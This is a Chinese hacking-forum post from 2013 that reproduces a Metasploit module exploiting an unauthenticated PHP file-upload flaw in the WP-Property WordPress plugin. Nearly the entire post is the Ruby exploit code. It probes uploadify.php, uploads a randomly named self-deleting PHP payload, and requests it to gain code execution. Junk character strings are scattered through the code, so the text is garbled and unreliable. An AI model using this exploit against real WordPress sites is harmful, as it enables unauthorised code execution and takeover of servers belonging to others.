找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2174|回复: 0
打印 上一主题 下一主题

WordPress WP-Property PHP 文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:51:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WordPress WP-Property PHP 文件上传漏洞# h% E- Y2 c3 A( A, F
, \- {- x. j) h3 u5 ]
## # This file is part of the Metasploit Framework and may be subject to- Y% ?: I3 H: F( v9 l. \
( }2 s. ^6 y7 `& x' T2 `+ I! b
# redistribution and commercial restrictions. Please see the Metasploit1 Q$ Z, r' M$ K2 N  [
4 ]8 y0 r2 t+ n$ d9 q3 m  ~
# Framework web site for more information on licensing and terms of use.3 t: z! V1 ?7 C) b$ q* H' L  f
7 u7 a9 y6 e7 E8 A6 Y+ W1 t2 d
#   http://metasploit.com/framework/ ##
' U; I! ]. J4 K* D0 ^/ T% F9 Q
: |1 y3 T( i! d/ U5 W
1 X5 O( I% h$ u* H9 o  w
( B  z9 ~3 b6 Z( \! p9 m
3 H" u% l6 y' W) N4 f( d; C
" B  m4 T0 G5 N( K; A- W% Arequire 'msf/core'  K2 _. h7 M+ U2 w! y# _7 w6 \# j
require 'msf/core/exploit/php_exe'
& H$ s  I8 ^! O. v6 ]
3 b$ O; K4 M9 }. Bclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
" I  ?: _" O. J1 T8 r'Description'    => %q{! A" o. t" B+ V/ c" O+ n
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
# {- B4 T& s' d& H3 }1 ~4 c- [[
9 h4 R6 F& Q" y'Sammy FORGIT', # initial discovery: V' r5 ~* M8 E4 F: x) x5 v- b
'James Fitts <fitts.james[at]gmail.com>' # metasploit module7 D. c9 [5 l& Q' C
],  T8 R7 d# t* D/ H
'License'        => MSF_LICENSE,
( v1 S& g9 S. ^. a# k* e'References'     =>
9 D' R4 n  Y0 i! D) i[
4 E; l, u$ s& k# J% ^- P% q; I[ 'OSVDB', '82656' ],. Z! p3 J- e/ l/ e9 |/ G
[ 'BID', '53787' ],- Y: t7 U. f" F# p2 y
[ 'EDB', '18987'],
" ?7 P2 ]# r9 o# ][ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
. L3 v* B% c. s5 Q, V, p* E- h],- e) e' E7 V( n( |- y
'Payload'        =>) t  r: |9 z% J' m$ x
{
9 R( A3 {8 d8 v3 B* H'BadChars' => "\x00",0 Q! J% m  ?( A4 Q4 y- r; V
},
$ s% \% Q# X5 K; o& j9 S'Platform'       => 'php',
6 _8 h  D- O( d( N# F/ f; ^'Arch'           => ARCH_PHP,
8 t3 j* E1 Y5 w. F1 ?* C'Targets'        =>
6 Q% L' ~) |9 t3 D/ v  D- E[) M! L: k3 m0 [5 y* U$ S
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
6 w8 ?9 w3 S/ d6 k[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 j% Q/ W2 T7 ~],
4 i3 B0 o  @6 F! [- H5 a2 p'DefaultTarget'  => 0,
( }8 w% W8 {* y% I'DisclosureDate' => 'Mar 26 2012'))' U, h, H/ Q: a1 a( L
4 l( X2 J  p# h% H, v
register_options(
  i  d' R5 ?0 m7 H- w$ O3 [[7 c) S" g5 n, `5 l$ v9 E- z
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
7 Z! d4 Q  l# X% Y: X], self.class)$ l6 n: B3 a3 o, x
end
  d1 i" i6 c1 {: E- F7 z1 `+ A. j" Q
) `' n" M; t/ h- y. d. D/ pdef check5 T8 M) _# d$ n9 @( g5 P
uri =  target_uri.path4 s+ \" k3 U) P% S* z( o% F
uri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',. w2 m+ F! I& x! a; r1 M5 W
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"8 [3 c7 x% c6 ^/ H
})
  H8 y: V! Y& W# e1 J( W4 w# o1 ~0 @
1 {5 E) q/ T) {2 y: c0 cif not res or res.code != 200
2 k3 u1 j8 ~: K# E9 mreturn Exploit::CheckCode::Unknown
7 P" s. r0 A, ~, _& j, e8 iend
. a! ]3 y, P. k2 b; L. n' {/ \1 c+ s7 ^# j. y! Y8 B0 F- a, A
return Exploit::CheckCode::Appears* v1 p, o' p  [( b4 x
end- y0 F, A/ C9 W5 R$ w

/ X. j+ @" O; [9 a6 ~8 Wdef exploit( a6 c" x3 l7 D
uri =  target_uri.path
* e, A2 h4 e/ p' l) C) h  vuri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)
/ V7 S! F) X& G9 c
- k$ R+ `% _8 C0 ?, }( j& Edata = Rex::MIME::Message.new# z* Y# @6 j8 R
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")3 Z9 j9 J0 f! U# l# P; M2 n
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")0 e) ~. b% J$ S
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
8 b& G" ^% K7 }$ x* p
" V% x  q, _1 ?% M' F  |print_status("#{peer} - Uploading payload #{@payload_name}")1 A& P: C! ~3 T3 _
res = send_request_cgi({
1 \) \1 r' d! f'method' => 'POST',
7 n9 ~$ s0 `( b$ }4 [/ Q% i5 C'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",6 h# Z9 }4 }( K' f& n* c% Y3 c  ~2 n
'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+ |( v2 K+ z) J# i8 }'data'   => post_data
# c% W; c. p0 I( i8 G' Y})
" o: S+ }# I. o1 E7 V: j7 l! Z3 O' \( y' k; ]3 |
if not res or res.code != 200 or res.body !~ /#{@payload_name}/7 O2 j" }0 c: H5 y# {
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
2 T) l% j  L2 X2 y9 Yend& y& x' d4 ]3 X" k4 Q
8 X) `0 \- y0 D/ z/ ~0 y; ~
upload_uri = res.body2 ]# e( o* D6 y1 ^
+ K6 q5 W. W; P; X( D
print_status("#{peer} - Executing payload #{@payload_name}")
  z# |4 @  D* s2 i+ ^. eres = send_request_raw({
0 S# f0 T: N3 A) o7 x6 ]- v'uri'    => upload_uri,4 P5 t' [5 W5 B+ G1 R
'method' => 'GET'7 K$ \/ h& {# v9 H
})
: U5 M7 _2 b/ `3 Z# Oend7 o* M, n; F9 C8 l' e
end
4 x3 O+ ]+ ?4 T$ j3 N; X) {, E) W4 p# l3 Q
不要问我这写的是什么 怎么利用 我是说msf.2 H- X" y$ K: z7 _( z

8 B3 m- b' H; r0 g9 T# n8 Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表